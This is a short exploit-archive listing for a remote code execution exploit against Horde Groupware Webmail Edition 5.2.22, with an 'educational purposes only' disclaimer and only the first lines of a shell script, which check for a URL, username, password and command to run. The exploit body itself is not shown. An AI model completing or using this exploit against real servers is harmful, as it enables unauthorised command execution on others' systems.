Exploits / Vulnerability Discovered : 2020-03-10 |
Type : webapps |
Platform : php
This exploit / vulnerability Horde groupware webmail edition 5.2.22 remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/bin/sh
if [ "$#" -ne 4 ]; then
echo '[!] Usage: <url> <username> <password> <command>' 1>&2
exit 1
fi